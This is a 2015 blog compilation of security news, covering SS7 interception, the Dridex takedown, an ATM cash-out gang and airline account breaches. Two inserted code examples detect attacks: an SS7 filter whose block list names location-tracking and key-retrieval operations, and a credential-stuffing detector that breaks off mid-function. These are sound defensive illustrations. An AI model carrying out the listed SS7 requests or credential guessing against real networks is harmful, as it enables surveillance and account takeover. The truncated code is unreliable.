Thursday, 22 October 2015

FBI cyber experts deny Bourne-style biometric snooping exists, but it may one day

Cyber spooks in films and TV shows like Bourne and 24 often have access to a sprawling, real-time surveillance system capable of watching and scanning the faces of the public anywhere in the world.
Yet technology experts with experience of the FBI have recently claimed this is far removed from the reality of how such biometric systems can actually be used.
Jim Loudermilk, a senior-level technologist at the FBI's science and technology branch, said the agency does not have access to real-time face-recognition biometrics on anything like that scale.
"Here in London you are all familiar with the vast numbers of cameras. But most of you probably don't realise that what you see in the science fiction movies is not true," he told a recent biometrics conference in London.
"My own assessment is that the use of pattern-matching technology for faces is about at the maturity level that pattern matching of fingerprints was in the late 1980s.
"We do not have highly reliable automated systems that can instantaneously ingest video and track people from camera to camera unaided by a human being."
Loudermilk explained that face recognition and biometric analysis is not yet able to provide the FBI with conclusive positive IDs, and that the lack of functionality comes down to budgets.
"If we were prepared to spend a few hundred million dollars and add several hundred people as skilled examiners we probably could do positive identification from faces in a decade, but I think it's unlikely we will choose to make that sort of investment."
Even if it did, the actual database of files against which this sort of information could be cross-referenced is quite small by big-data standards: "We don't have very many mug shots on file. Only about 20 million at the moment," he added.
Another face in the crowd
The claim that face-recognition tools are not yet at the level of the movies is echoed by Leo Taddeo, a former FBI special agent in charge of the New York cyber division and now the CSO for Cryptzone, but he believes it will be possible one day.
"Today, it may not be possible to spot a known terrorist in a photo of a crowd at a sporting event, but someday that capability will exist," he told V3.
Taddeo also noted that the use of face recognition has evolved to the point where it can be used in "many investigative scenarios".
"Agents are now able to check the photo of a bank thief taken from a surveillance camera against a set of known convicts to find a potential suspect. The confirmation of identity is still done using multiple factors, but narrowing down the search is greatly aided by the new face-recognition technologies," he explained.
However, the use of such technologies, and their potential future capabilities, obviously raises civil liberties and privacy concerns.
Dr Richard Tynan, technologist at Privacy International, warned of a need for clear definitions in biometric capabilities.
"I think you might have to ask what they mean by real time. Is it that they are unable to get the name and address information of every individual in a given scene of a CCTV camera?" he said.
"Even if that's what they are trying to do, it's incredibly worrying that they are trying to do real-time identification of individuals and not just when a crime happens, which is one of the stated purposes of CCTV."
Furthermore, Dr Tynan noted that the FBI staffers' claims seem to be at odds with private firms already rolling out sophisticated face-recognition systems.
"Microsoft has recently rolled out face recognition on some of its latest laptops which will allow you to unlock the computer," he said.
"There are other types of face recognition such as Facebook deploying auto tagging in pictures, claiming to have sophisticated technology that can distinguish between identical twins.
"So the [1980s] comment seems weird to me given that we have seen so many claims made about this technology from the private sector."
Privacy International also provided V3 with documentation showing a range of 'vision analytics' tools that offer sophisticated biometrics and location monitoring in real time (PDF).
Yet while FBI experts play down the scope of real-time surveillance systems, they openly admit that the use of biometrics in law enforcement is not a new phenomenon.
The FBI currently uses a vast amount of technology to take advantage of the unique indicators carried by biometric information, such as fingerprints, iris patterns and palm and finger prints.
"The use of fingerprints has been a fundamental investigative tool in the FBI's kit for almost its entire 100-year history," explained Taddeo.
"For most of the last century, the science of collecting, cataloguing and comparing fingerprints did not change very much. Advances in information technology have allowed us to make quantum leaps in fingerprint and other identification technologies.
"We can collect fingerprints as electronic images. As such, we can transmit and search for matches at record speed. This means police officers don't have to wait for a manual search. It also means we can search wider databases."
Loudermilk gave some insight into the scope of these databases, during his presentation in London last week.
"We have 69 million people currently on file and we have another 37 million on file in the civil repository and I expect that to grow significantly. Right now we have 106 million people, all separate identities," he said.
"We have a fairly substantial repository of people who have been arrested for criminal offences."
However, it is DNA matching that remains the 'gold standard' in biometrics and forensics.
Loudermilk said that the FBI holds 14 million known DNA subject profiles in a national database consisting of the Combined DNA Index System and the National DNA Index System.
Double-edged sword
Unquestionably, law enforcement will continue to use biometric analysis to aid its operations, but it can be a double-edged sword, as Taddeo explained.
"For example, after the recent OPM breach, where millions of government employee fingerprints were reportedly stolen by the Chinese government, it will be much harder for a US agent to enter China without the Chinese knowing who they are and who they work for," he said.
"The same is true for fingerprints and facial recognition. Undercover agents will have a harder time getting past border controls in an undercover capacity."
Perhaps this is something Hollywood scriptwriters will have to consider for their future spy thrillers too.

Security researchers face wrath of spy agencies

Researchers tasked with revealing attacks by intelligence agencies are being harassed, locked out of tenders, and in some cases deported, Kaspersky researcher Juan Andrés Guerrero-Saade says.
Retaliation by the unnamed agencies is a direct response to the prominent advanced persistent threat (APT) reports that have coloured information security reporting over recent years.
Those reports have seen researchers reveal malware attacks by government spy agencies.
Specific details of the harassment are tightly held, although some of it reportedly occurs in Eastern European and Asian nations.
Guerrero-Saade told Vulture South researchers have spoken about their ordeals in private information security circles. Other stories circulate as industry rumour.
"In many places intelligence services tend to be more civilised than in others -- you would be lucky to deal with them in the US versus wherever else, Latin America, Asia, or Eastern Europe where they take very different tactics," Guerrero-Saade says.
"You can definitely see these threats to livelihood[s] where it can be as simple as patriotic notions … all the way to 'you have already made it clear where you stand and it's going to be next to impossible for you to get a security clearance' and to work in a large sector of countries where a large amount of anti-malware work is being done.
"I think it is easier to imagine situations where blackmail, compromise, and threat of livelihood is an issue, and it has been an issue for certain researchers [who] for obvious reasons aren't going to speak up."
Other researchers speaking to this reporter have heard similar stories. Others haven't but aren't surprised their colleagues find security clearances revoked. China is cited as a nation some opt to avoid.
Guerrero-Saade spoke on the back of his paper The ethics and perils of APT research: An unexpected transition into intelligence brokerage [pdf], which he describes as a "meditation" on the perils faced by threat intelligence companies and researchers as ultimately altruistic research aggravates diplomatic and national interests.
The paper notes that researchers are targeted through blackmail, which it regards as a cheap way for agencies to "own" an individual by digging up their secrets, debt, and "shameful proclivities and mis-steps".
"This type of compromise is in some cases related to the threat to livelihood as private information security companies have displayed a more or less strict moralism in their hiring practices, often preferring practitioners untainted by publicly known blackhat tendencies," Guerrero-Saade writes.
Security researchers who live in the country of the aggrieved intelligence agency face the harshest treatment. Here agencies target threats to living conditions including the revocation of non-citizens' resident status, "in some cases separating families or forcing a return to dreadful conditions".
Natives are described as unpatriotic, and are barred from government work and holding security clearances.
“In certain countries, citizenship is only a protection from overt and legal repercussions but processes without oversight are the main playing field of security services. Vague threats carry weight in this space.”
That is leading to a Balkanisation of the industry that is "well underway at this time".
Intelligence firms too are being harassed. Guerrero-Saade says unnamed agencies issue threats to "operational viability, revenues, ongoing and potential contracts, strategic partnerships, PR value, as well as regulation-based financial repercussions".
From the agencies' perspective, such harassment merits "any effective measures available" when threat research stands in direct opposition to national diplomatic, financial, or political viability.
Such work may cause heightened diplomatic tensions to flare, or jeopardise the reputation of an intelligence agency or those it serves. Here's a fragment of his talk:
"Companies with government contracts will see these contracts dangled and unrelated vital strategic partnerships may suddenly become unstable or entirely unavailable. When international companies are involved, unsubstantiated but well-placed insinuations may suffice in closing off entire crucial market sectors and, if not, threats of loosely applied embargoes can destroy the most meticulously built business."
He further details the perils of the burgeoning threat intelligence industry in the absence of any kind of rules of engagement: many researchers, rightly so, treat all malware as abusive regardless of source, and the motivations and actors behind attacks are often glossed over.
The nine-page report lists the publication of intelligence materials by private-sector firms among the 'regular grievances', as something "unthinkable to their intelligence agency counterparts". Another extract:
"Provocation occurs in two scenarios: first, where the (threat intelligence) company’s research causes political, diplomatic, or military tensions to flare between nations in an already escalated posture. Secondly, when the company’s public disclosure -- or private offering provided directly to sensitive targets -- endangers the reputation of the intelligence agency itself or worse yet comes close to revealing or endangering the requesting customer. The former scenario is undesirable; the latter scenario is unacceptable."
Not all research weighs the same. Guerrero-Saade says a recent report examining Chinese threat actors overstepped the boundaries of usefulness when it revealed the personal information of attackers including their daily activities, photos, and family members.
The future is unclear, the researcher says. Intelligence agencies may be pushed to develop highly capable malware designed to slip past researchers, while even the most capable researchers dabbling in the unmasking of intelligence agencies will need to undergo "drastic preparations" not only to excel but to survive.

Friday, 16 October 2015

A bug in Facebook accidentally shows how popular your posts are

Facebook is diligently attempting to remove a software bug that lets users of its mobile website see view counts for their own and others' posts within the social network.

Facebook currently displays the number of views under videos posted on the site, but this bug goes further and exposes the number of views on any article or video link, including those from news media and other official organizational pages. The bottom line of this revelation is the realization that nothing you say or share will ever be as popular among your friend group as an arbitrary article or a video on how to make ramen fries.

Currently the bug only affects Facebook's mobile site, not Facebook for conventional desktop PCs or the company's official mobile apps. Facebook has confirmed the bug and says it is removing the view counts from user posts.

Facebook says it has no plans to let individual users see view counts. Part of the bargain of using Facebook is the understanding that you are feeding content into a black box, controlled by proprietary algorithms that users neither control nor are allowed to understand.

In 2013, a Stanford University study conducted by assistant professor Michael S. Bernstein and Facebook's data science team revealed that the average Facebook user reaches only about 35 percent of their friends with a single post and, over the course of a month, barely two out of every three friends.

This problem also affects media organizations and other page owners that have been on Facebook for years. Page owners who have invested heavily in attracting followers and growing their number of likes are often shocked to find that the social network charges them to reach more than a small fraction of that audience.

But Facebook holds the keys to its News Feed, and for now that's how it goes. Until, of course, a bug comes along and we see just how popular, or not, you really are in your Facebook network.

Malaysia arrests hacker for stealing U.S. security data

NBC News has learned federal prosecutors have charged a Kosovo man they believe is responsible for assembling an ISIS "kill list" of more than 1,000 military personnel and U.S. government employees. (USA TODAY)

A Kosovar man living in Malaysia who accessed the personal data of more than 1,300 government and military employees, and passed that data on to the Islamic State, has been arrested in Malaysia on U.S. charges, the Department of Justice announced Thursday.
Ardit Ferizi also accessed customer data from an unidentified Internet retailer, obtaining credit card information on 100,000 customers, according to a federal indictment unsealed in Virginia. Ferizi, allegedly head of a group of Albanian hackers from Kosovo, even went so far as to admonish employees of the retailer via email when they detected his penetration of their system and blocked him.
According to a lengthy affidavit filed by FBI special agent Kevin Gallagher, who is based out of the Washington field office, Ferizi had unauthorized access to a federal computer and used that access to obtain email addresses, cities of residence, dates of birth and other personally identifying information on 1,351 government and military workers, and passed those names on to the Islamic State terrorist group between April and August.
He transferred the information via links he posted to Twitter, the affidavit said, "for the purpose of encouraging terrorist attacks against the individuals." He also used the social media site to communicate with two known Islamic State members, Tariq Hamayun, also known as Abu Muslim al-Britani, and Junaid Hussain, also known as Abu Hussain al-Britani. Hussain died in August in an air strike in Raqqah, Syria.
The activity prompted the Islamic State Hacking Division to tweet a message to "crusaders" engaged in a "bombing campaign" against Muslims: "We are in your emails and computer systems, watching and recording your every move, we have your names and addresses … we are extracting confidential data and passing on your personal information to the soldiers of the khilafah, who soon with the permission of Allah will strike your necks in your own lands!”
Regarding the retailer, which is not named in the document, Ferizi in June accessed a server in Phoenix belonging to an Internet hosting company that maintains the retailer's website, according to the affidavit. On Aug. 13, the retailer contacted the FBI to report unauthorized access to its site, Gallagher wrote.
Since spring 2015, Ferizi had been living in Malaysia on a student visa and studying at Limkokwing University of Creative Technology in Cyberjaya, Malaysia.

Hackers steal £20 million from UK bank accounts using malware

Law enforcement agencies, with the help of several cybersecurity firms, have taken control of a botnet of machines that distributed malicious software known as "Bugat," "Cridex" or "Dridex." The Dridex malware was used by cyber criminals to steal some £20 million ($30 million) from UK bank accounts, according to the National Crime Agency (NCA).

The NCA has issued a warning to Internet users, especially those in the United Kingdom, to protect themselves against Dridex, and said it is chasing down the "technically skilled" cyber criminals behind it. According to the NCA, the malware preyed on unsuspecting people by slipping into their computers, stealing passwords and siphoning money from bank accounts. For distribution it relied on a network of enslaved computers; experts say the botnet infected perhaps 125,000 computers a year.

Separately, the U.S. Department of Justice has filed criminal charges against Andrey Ghinkul, a 30-year-old man believed to have been the hacker at the helm of the operation. Ghinkul was recently arrested in Cyprus, and American prosecutors are seeking to have him extradited to stand trial in the United States. U.S. Attorney David J. Hickton of Pennsylvania said: "We have struck a blow to one of the most pernicious malware threats in the world."

According to the indictment, Ghinkul's cyber crimes have been going on for years. Investigators believe Ghinkul and others sent official-looking spam that tricked people into opening poisoned email attachments. Using that method, they were able to steal $3.5 million from Penneco Oil in Pennsylvania in 2012 and send it to bank accounts in Belarus and Ukraine, according to the indictment.

Bugat evolved over the years into smarter and more capable versions; researchers later called it Cridex, then eventually Dridex. The massive botnet distribution system, the one that has just been shut down, made Dridex the most prevalent malware bombarding corporate computer networks. If a work email account got hit with spam, it is likely much of it was Dridex.

Security researchers collaborated with law enforcement agencies on the operation. Researchers from Proofpoint said the hackers sent out waves of up to 350,000 Dridex-laced spam emails every day, while researchers at Dell SecureWorks started a project to disrupt the monstrous botnet, teaming up with law enforcement and receiving legal permission to hack the botnet, according to the company.

In the United Kingdom, Mike Hulett of the NCA said: "This is a particularly virulent form of malware and we have been working with our international law enforcement partners, as well as key partners from industry, to mitigate the damage it causes."

Think your mobile calls and texts are private? It ain't necessarily so


Mobile networks around the world have been penetrated by criminals and governments via bugs in signalling code.
Security holes have been found in a technology known as Signalling System 7 (SS7), which helps to interconnect international mobile networks across the globe.
AdaptiveMobile has uncovered evidence of global SS7 attacks damaging mobile operators around the world, after partnering with operators to analyse and secure the SS7 traffic crossing their networks.
Exploits, including location tracking and call interception, are said to be rife. The study also uncovered evidence of attempted fraud, focusing on Europe, Middle East and the Americas.
The results are a serious concern but not entirely surprising. Flaws in SS7 have been known about for years and readily lend themselves to surveillance, both targeted and on a grand scale, allowing miscreants to tap into calls, read text messages and divert traffic.
In one well-documented case, SS7 flaws were used to redirect sensitive conversations of targeted individuals on the MTS Ukraine network to a Russian mobile operator.
By contrast, SS7 is far more robust when it comes to the security and integrity of billing functionality. Even so, some studies have suggested SS7 loopholes can be abused to move credit between mobile accounts.
Attacks such as "silent SMS pings" can be used to locate mobile phones anywhere in the world via SS7. With the right request it might be possible to trick a mobile network into handing over the crypto keys for any SIM/session. This rumoured, but unverified, capability would be restricted to the more capable intelligence agencies.
Details of the SS7 vulnerabilities were laid out publicly at the Chaos Communication Congress hacker conference in Hamburg last December. El Reg's story on the CCC presentation provides more information on how the ageing SS7 protocol works as well as on potential attacks.
AdaptiveMobile’s SS7 Protection service, launched in February 2015, aims to analyse and secure the SS7 traffic travelling through operator networks. The firm uses the combination of an SS7 Firewall, advanced reporting and threat intelligence to identify and combat threats. Sitting on the systems of 75 operator networks worldwide, AdaptiveMobile protects one fifth of the world’s subscribers, witnessing in excess of 30 billion mobile events every day, according to the mobile network security firm.
Unauthorised access to the SS7 network can cause significant financial and reputational damage to the operator community, according to AdaptiveMobile. Fraudulent roaming configurations can cost operators millions of dollars without any opportunity to recapture this revenue. Without appropriate preventative measures being put into place, operators are allowing adversaries to know exactly where a subscriber is at any given moment and to intercept and reroute device communications, listening to every call and reading every text message, the firm warns.
“Through our analysis of SS7 traffic we’ve detected numerous types of SS7 requests and responses being received and sent from one operator network to another,” said Cathal McDaid, head of AdaptiveMobile’s Threat Intelligence Unit. “From the Americas to MENA, Europe to APAC, the operator networks analysed have all shown evidence of suspicious SS7 activity. We’re working with operators to secure their networks as none are exempt from these types of attacks.”
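The two checks an interconnect-facing SS7 firewall of the kind described above performs are, in essence, an allowlist of MAP operations that should never arrive from a foreign network, and a plausibility check on the location-dependent ones. The following is an added illustration written for this page; it is not AdaptiveMobile's product or any operator's code. It assumes the GSMA FS.11 split of MAP operations into categories (the "category 1" and "category 3" sets below), an invented key=value log format, a made-up country lookup keyed on the source global title's country code, and an arbitrary 1,000 km/h travel-speed threshold; the log lines are constructed for the example.

```python
"""Added example: screening MAP requests that arrive over the international SS7
interconnect. Toy code for this article, not AdaptiveMobile's firewall."""
import math
import re
from datetime import datetime, timezone

# Assumption: country code -> (country, approx. latitude, longitude). Only the
# codes used by the constructed sample log are present.
COUNTRIES = {
    "1": ("US", 38.0, -97.0),
    "44": ("GB", 54.0, -2.0),
    "49": ("DE", 51.0, 10.0),
    "380": ("UA", 49.0, 32.0),
    "7": ("RU", 55.0, 37.0),
}

# Assumption (GSMA FS.11 "category 1"): operations with no legitimate reason to
# cross an interconnect. They are the location-tracking and subscriber-profiling
# primitives, so a foreign source is blocked outright.
CATEGORY1 = {"anyTimeInterrogation", "anyTimeModification", "sendParameters",
             "sendIMSI", "provideSubscriberInfo", "provideSubscriberLocation"}

# Assumption (FS.11 "category 3"): legitimate for roaming, but only from where the
# subscriber plausibly is. updateLocation moves the profile to the requesting
# VLR (enabling call/SMS rerouting); sendAuthenticationInfo hands out
# authentication vectors, i.e. session key material.
CATEGORY3 = {"updateLocation", "sendAuthenticationInfo", "sendRoutingInfoForSM"}

MAX_SPEED_KMH = 1000.0  # assumption: nothing legitimate outruns an airliner

LINE_RE = re.compile(r"(\w+)=(\S+)")


def parse(line):
    """Parse one constructed 'key=value ...' log line into a dict."""
    ev = dict(LINE_RE.findall(line))
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return ev


def country_of(global_title):
    """Longest-prefix match of the E.164 country code in a source global title."""
    digits = global_title.lstrip("+")
    for length in (3, 2, 1):
        if digits[:length] in COUNTRIES:
            return COUNTRIES[digits[:length]]
    return None


def distance_km(a, b):
    """Great-circle distance between two (country, lat, lon) tuples."""
    lat1, lon1, lat2, lon2 = map(math.radians, (a[1], a[2], b[1], b[2]))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def screen(lines):
    """Return a list of (imsi, op, verdict, reason) for each request.

    last_seen is the per-IMSI location established by the last accepted
    updateLocation; a real firewall would seed it from the HLR instead.
    """
    last_seen = {}
    verdicts = []
    for line in lines:
        ev = parse(line)
        op, imsi, src = ev["op"], ev["imsi"], country_of(ev["src"])
        if op in CATEGORY1:
            verdicts.append((imsi, op, "block", "category 1 operation from interconnect"))
            continue
        if op in CATEGORY3 and src is not None:
            prev = last_seen.get(imsi)
            if prev is not None:
                hours = max((ev["ts"] - prev[0]).total_seconds() / 3600.0, 0.0)
                km = distance_km(prev[1], src)
                if km > MAX_SPEED_KMH * hours:  # covers hours == 0 as well
                    verdicts.append((imsi, op, "flag",
                                     f"implausible move {prev[1][0]}->{src[0]}"
                                     f" ({km:.0f} km in {hours:.1f} h)"))
                    continue
            if op == "updateLocation":
                last_seen[imsi] = (ev["ts"], src)
        verdicts.append((imsi, op, "allow", "no finding"))
    return verdicts


# Constructed sample: a German-roaming subscriber is probed from a Ukrainian
# global title ten minutes after attaching in Germany.
SAMPLE_LOG = [
    "ts=2015-10-20T08:00:00Z src=+491711234567 op=updateLocation imsi=262011234567890",
    "ts=2015-10-20T08:05:00Z src=+380671234567 op=anyTimeInterrogation imsi=262011234567890",
    "ts=2015-10-20T08:10:00Z src=+380671234567 op=sendAuthenticationInfo imsi=262011234567890",
    "ts=2015-10-20T09:00:00Z src=+380671234567 op=updateLocation imsi=262011234567890",
    "ts=2015-10-20T20:00:00Z src=+441234567890 op=updateLocation imsi=262011234567890",
]

if __name__ == "__main__":
    for imsi, op, verdict, reason in screen(SAMPLE_LOG):
        print(f"{verdict:5s} {op:24s} {reason}")
```

On the constructed log the first attach in Germany is allowed and becomes the baseline, the anyTimeInterrogation is blocked as a category 1 request regardless of source, and both the authentication-vector request and the attempted re-registration from Ukraine are flagged because the subscriber cannot have travelled roughly 1,500 km in under an hour; the British attach twelve hours later passes. The design choice worth noting is that a flagged updateLocation does not overwrite the baseline, otherwise an attacker's first request would legitimise the next one.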
Chris Wysopal, CISO and CTO at application security firm Veracode, commented: “The SS7 vulnerabilities are just another example of software-based systems that weren’t built for the rich interconnectivity and threats of the modern mobile infrastructure.”
“Development teams need to go into projects with the expectations that what they’re creating will live in a hostile environment where attackers will look to exploit vulnerabilities. We’ve seen this across every industry and it’s no surprise it’s occurring in the telco industry,” he added.
The potential for abuse by any group capable of breaking into SS7 is considerable, according to Wysopal.
“A core protocol like SS7 provides governments and rogue actors wide access to the world’s communications infrastructure making it an incredibly attractive system to break into,” Wysopal explained. “Until software developers change their approach and build security into their code from the start, we’re going to continue to see these problems.”
A worldwide map of SS7 international roaming infrastructure vulnerabilities, put together following an earlier study by telecom security specialist P1 Labs late last year, can be found here. China is among the countries with the worst rating for SS7 security, alongside the likes of Uzbekistan. Somalia and Yemen, as well as (more surprisingly) Bolivia and Greenland, are also highlighted.

Students, graduates, amateurs: Win £10,000 in Cyber 10K challenge

NCC Group is running the Cyber 10K security challenge to encourage young people and security amateurs to join the industry – and The Register is the exclusive media partner.
You can scroll down for details of how to enter the competition.
As a background, the UK, as many of us know, has an ongoing shortage of skills in science, technology, engineering and mathematics (STEM), despite the best efforts of government-inspired education initiatives.
Vocational training and apprenticeships are a good foundation for acquiring practical skills and also deliver a demonstrable career path. Competition-based funds are one way industry can encourage young people to consider and embark upon careers in STEM, NCC Group’s Cyber 10K being a good example.
Ollie Whitehouse, technical director at NCC Group, explains: “We are continuously being reminded of the importance of STEM subjects and the ground-breaking innovations that can be created in these areas. Similarly to its STEM counterparts, the topic of computer science, and more specifically cyber security, is one that is difficult to fully grasp in a classroom or lecture theatre.
“Often, learning through experience is much more valuable. And if we are to develop the next generation of talent in the cyber security industry, it’s important that we offer IT amateurs the opportunity to gain real practical experience in order to better their skills.
“That’s where competitions like the Cyber 10K come in. These types of competition based funds create a win-win situation for both ambitious amateurs and the sector – they help to nurture and encourage talent, resulting in a pipeline of knowledgeable, experienced and creative security professionals for the industry.”
Competition details are below. Get cracking!


Timing/duration: September – November 2015

Entry criteria

  • Description of the problem you are trying to solve.
  • Description of your solution and how it addresses the problem.
  • In addition to the above, for an entry to qualify you must include a working prototype: a functional solution that can be used to demonstrate the idea reliably and that accurately shows the idea working.
It is recommended that you also include design documentation for the solution.


There are no strict categories. Anything goes as long as it hits the entry criteria, but some areas that you might want to think about include:
  • cloud security
  • cyber incident response and clean-up
  • IoT and mobile security
  • consumer and user awareness, training and support
  • cyber security on small budgets

The judging panel includes the following experts:

  • John Leyden, security reporter, The Register
  • Professor Steve Schneider, director, Surrey Centre for Cyber Security
  • Professor Tim Watson, director at University of Warwick’s cyber security centre
  • Alex van Someren, managing partner at Amadeus Capital Partners
  • Paul Vlissidis, director of .trust at NCC Group

Monday, 4 May 2015

Cybergang that was behind the $15 million bank robbery has been arrested by the Romanian authorities

The Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT) has shed light on a new cyber heist after raiding 42 locations on Sunday. It detained 25 people suspected of belonging to a 52-member international cyber gang whose members come not only from Romania but from various other parts of the globe.
The Romanian authorities suspect the gang hacked banks to obtain the data needed to clone payment cards, which were then used at ATMs across the world to steal more than $15 million.
According to DIICOT, the data required to clone the cards was obtained by hacking the computer systems of banks in the US (Puerto Rico) and in Muscat, the capital of Oman. The criminals targeted accounts belonging to large corporations, extracted the payment card data for those accounts and used it to create fraudulent cards. The cloned cards were then distributed to members of the gang, who used them to withdraw money from ATMs in many different countries.
According to the Romanian authorities, the gang was well coordinated: withdrawals were made in batches over short intervals and were timed for the banks' non-business days.
For example, on 20 February 2013 the criminals withdrew $9 million (€8.3 million) from ATMs across Japan. Similarly, on 2 December 2013 the gang made almost 4,200 transactions totalling $5 million (€4.6 million) in cash from ATMs across 15 Romanian cities. In total, within a year the gang made almost 34,000 ATM transactions in 24 countries.
DIICOT added that the gang also carried out fraudulent withdrawals in the US, UK, Germany, Italy, Spain, Netherlands, Canada, Colombia, Dominican Republic, Mexico, Indonesia, Egypt, Malaysia, Russia, Sri Lanka, Thailand, Ukraine, the United Arab Emirates, Pakistan and Latvia.
On Sunday the Romanian authorities executed 42 house searches in six cities. Police seized 16 laptops and smartphones used by gang members in the operation, along with 2 kg (4.4 lbs) of gold bars, €150,000 ($163,000) in cash and paintings. Money from the heist was also invested in real estate and other valuable goods by the group's leaders, all of which DIICOT says have been placed under restraint pending further investigation.
This is not the first cyber heist of its kind. In a similar scenario, a gang known as Carbanak succeeded in stealing $1 billion from banks and other financial institutions across 25 countries. Researchers at Kaspersky Lab reported the technique used by the criminals in February: they relied on spear phishing, targeting the victim's network with emails carrying malicious attachments. With this malware the criminals infected the computer systems of the banks and financial institutions and carefully learnt the internal procedures, moving through the network until they reached their point of interest, the systems from which money could be extracted. Since every bank follows different procedures, the infected computers were used to record video of the screen, which was sent to the attackers' servers so they could learn the commands used to move money; with that knowledge the criminals carried out their heists.
Another recent incident, still under investigation, is the Ryanair case, in which some $5 million was stolen from a bank account used for fuelling aircraft.
Security researchers report that the general trend among organised cybercriminals is to target banks and large financial institutions rather than their customers, in pursuit of bigger heists.

Fulton school district recovers from hacking

FULTON - The Fulton School District is still recovering from a denial-of-service hack carried out by one of its students.
The Fulton Police Department announced Friday that it arrested Austin Taylor Singleton, 17, who used a thumb drive loaded with malware to shut the system down.
Fulton Police received a call from Fulton High School advising that someone had hacked the district's computer network.
Through an investigation, the district's IT department traced the hacking back to a computer in one of the classrooms, where a student was confirmed to have been logged in at the time.
Fulton Superintendent Jacque Cowherd said the district will prosecute Singleton in order to deter further attempts.
Singleton was arrested and charged with tampering with computer equipment, a class A misdemeanor.
Police said there was no release of any confidential information as a result of the hack.

Ryanair hack sees €4.6m stolen and sent to Chinese bank account

Ryanair has been the victim of cyber theft
European airline Ryanair has admitted falling victim to a hacking attack that saw €4.6m of the company's money transferred to a bank account in China.
Law enforcement agencies and financial organisations have already been alerted to the incident, according to reports, and Ryanair is confident that it will get the money back.
"Ryanair confirms that it has investigated a fraudulent electronic transfer via a Chinese bank last week. The airline has been working with its banks and the relevant authorities and understands that the funds, less than $5m, have now been frozen," the company said.
"The airline expects these funds to be repaid shortly, and has taken steps to ensure that this type of transfer cannot recur. As this matter is subject to legal proceedings, no further comment will be made."
The relevant authority in Ryanair's home country of Ireland is the Criminal Assets Bureau, an independent body with powers similar to the local police.
Like the UK Assets Recovery Agency, the Criminal Assets Bureau focuses on serious crimes and the ability to pursue assets from criminals and compensate victims.
The airline industry benefits and suffers from its use of technology. American Airlines was forced to ground flights this week because of a software problem. British Airways fell victim to an apparent hack in March that affected its most frequent fliers.
The company cleared out some of its user accounts and changed log-ins, but it was revealed that the hack was more of a probe on its systems enabled by a leak from another provider.
"This appears to have been the result of a third party using information obtained elsewhere on the internet, via an automated process, to try to gain access to some accounts,” BA said in a statement at the time.
The incidents underline the perils technology can pose to businesses and the importance of having adequate plans in place should things go wrong.

Hard Rock Casino Credit Card Breach Undetected for 7 Months

The Hard Rock Casino in Las Vegas has been hit with malware leading to the compromise of credit card data, names and addresses at restaurant, bar and retail locations. The compromise did not affect the hotel or casino transactions. No details regarding the specific malware or other specifics regarding the compromise were provided. The glaring point of this particular breach was that it went undetected for 7 months.
The fact that the compromise was not detected by the hotel itself is not surprising, as many retailers have been unable to detect the presence of point-of-sale malware or the exfiltration of card data. Most of the time retailers discover a breach when the Secret Service or fraud analysts at banks notify them that they have detected credit card fraud patterns, or stolen cards in underground markets, that point to their point-of-sale systems as the origin of the breach.
In its statement, the Hard Rock Casino did not say how it detected the breach, so it is not clear whether it was notified by an agency or bank or identified the breach on its own.

Tuesday, 14 April 2015

Hackers breach frequent-flyer Lufthansa accounts

The German airline has blocked several accounts after the attack.
Hackers have broken into the customer accounts of Lufthansa to spend their miles on purchases, reminiscent of similar incidents involving other top airlines in the past few months.
The German airline said that it has blocked several accounts after those of some frequent flyers were hacked.
According to German media reports, the attackers used a botnet that generated username and password combinations on numerous computers. The combinations that worked were then used to access frequent-flyer miles. A Lufthansa spokesperson was quoted as telling DPA news agency that it 'had not been able to prevent illicit access to some customer files'.
"We had to lock several hundred customer pages. We believe to have the problem generally under control," he said.
The miles have been credited back to the accounts of the affected customers, the airline added.
The attack on Lufthansa comes two weeks after thousands of British Airways frequent-flyer accounts were hacked in March.
American and United airlines reported similar incidents in December. American Airlines said that about 10,000 accounts were hacked while United Airlines confirmed that hackers booked trips or made mileage transactions on about three dozen accounts.
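The Lufthansa report above describes a botnet trying many username and password combinations from many machines until some work. The following is an added example, not code from the article or from any airline, showing the two signals a defender can look for in authentication logs to catch that pattern: one source address attempting logins against many distinct accounts, and one account receiving failures from many distinct sources shortly before a success. The log format, the sample lines and the thresholds are all constructed assumptions.

```python
"""Credential-stuffing detector run over constructed login-audit lines.

Added example (not from the article). Log format, thresholds and sample
data are assumptions, not any airline's real logging.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: "<ISO timestamp> <source_ip> <account> <result>"
SAMPLE_LOG = """\
2015-04-12T09:00:01 198.51.100.7 alice FAIL
2015-04-12T09:00:02 198.51.100.7 bob FAIL
2015-04-12T09:00:03 198.51.100.7 carol FAIL
2015-04-12T09:00:04 198.51.100.7 dave FAIL
2015-04-12T09:00:05 198.51.100.7 erin FAIL
2015-04-12T09:00:06 198.51.100.7 frank OK
2015-04-12T09:01:00 203.0.113.10 frequent42 FAIL
2015-04-12T09:01:05 203.0.113.11 frequent42 FAIL
2015-04-12T09:01:10 203.0.113.12 frequent42 FAIL
2015-04-12T09:01:15 203.0.113.13 frequent42 OK
2015-04-12T09:30:00 192.0.2.5 grace FAIL
2015-04-12T09:30:20 192.0.2.5 grace OK
"""


def parse_log(text):
    """Return a list of (timestamp, source_ip, account, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, account, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, account, result))
    return events


def flag_spraying_sources(events, window=timedelta(minutes=5), min_accounts=5):
    """Source IPs that tried >= min_accounts distinct accounts inside one window.

    A single bot cycling through a credential list looks like this.
    """
    by_ip = defaultdict(list)
    for ts, ip, account, _ in events:
        by_ip[ip].append((ts, account))
    flagged = set()
    for ip, attempts in by_ip.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            accounts = {a for t, a in attempts[i:] if t - start <= window}
            if len(accounts) >= min_accounts:
                flagged.add(ip)
                break
    return flagged


def flag_distributed_takeovers(events, window=timedelta(minutes=5), min_sources=3):
    """Accounts where a success followed failures from >= min_sources distinct IPs.

    A botnet spreading guesses over many machines looks like this per account.
    """
    by_account = defaultdict(list)
    for ts, ip, account, result in events:
        by_account[account].append((ts, ip, result))
    flagged = set()
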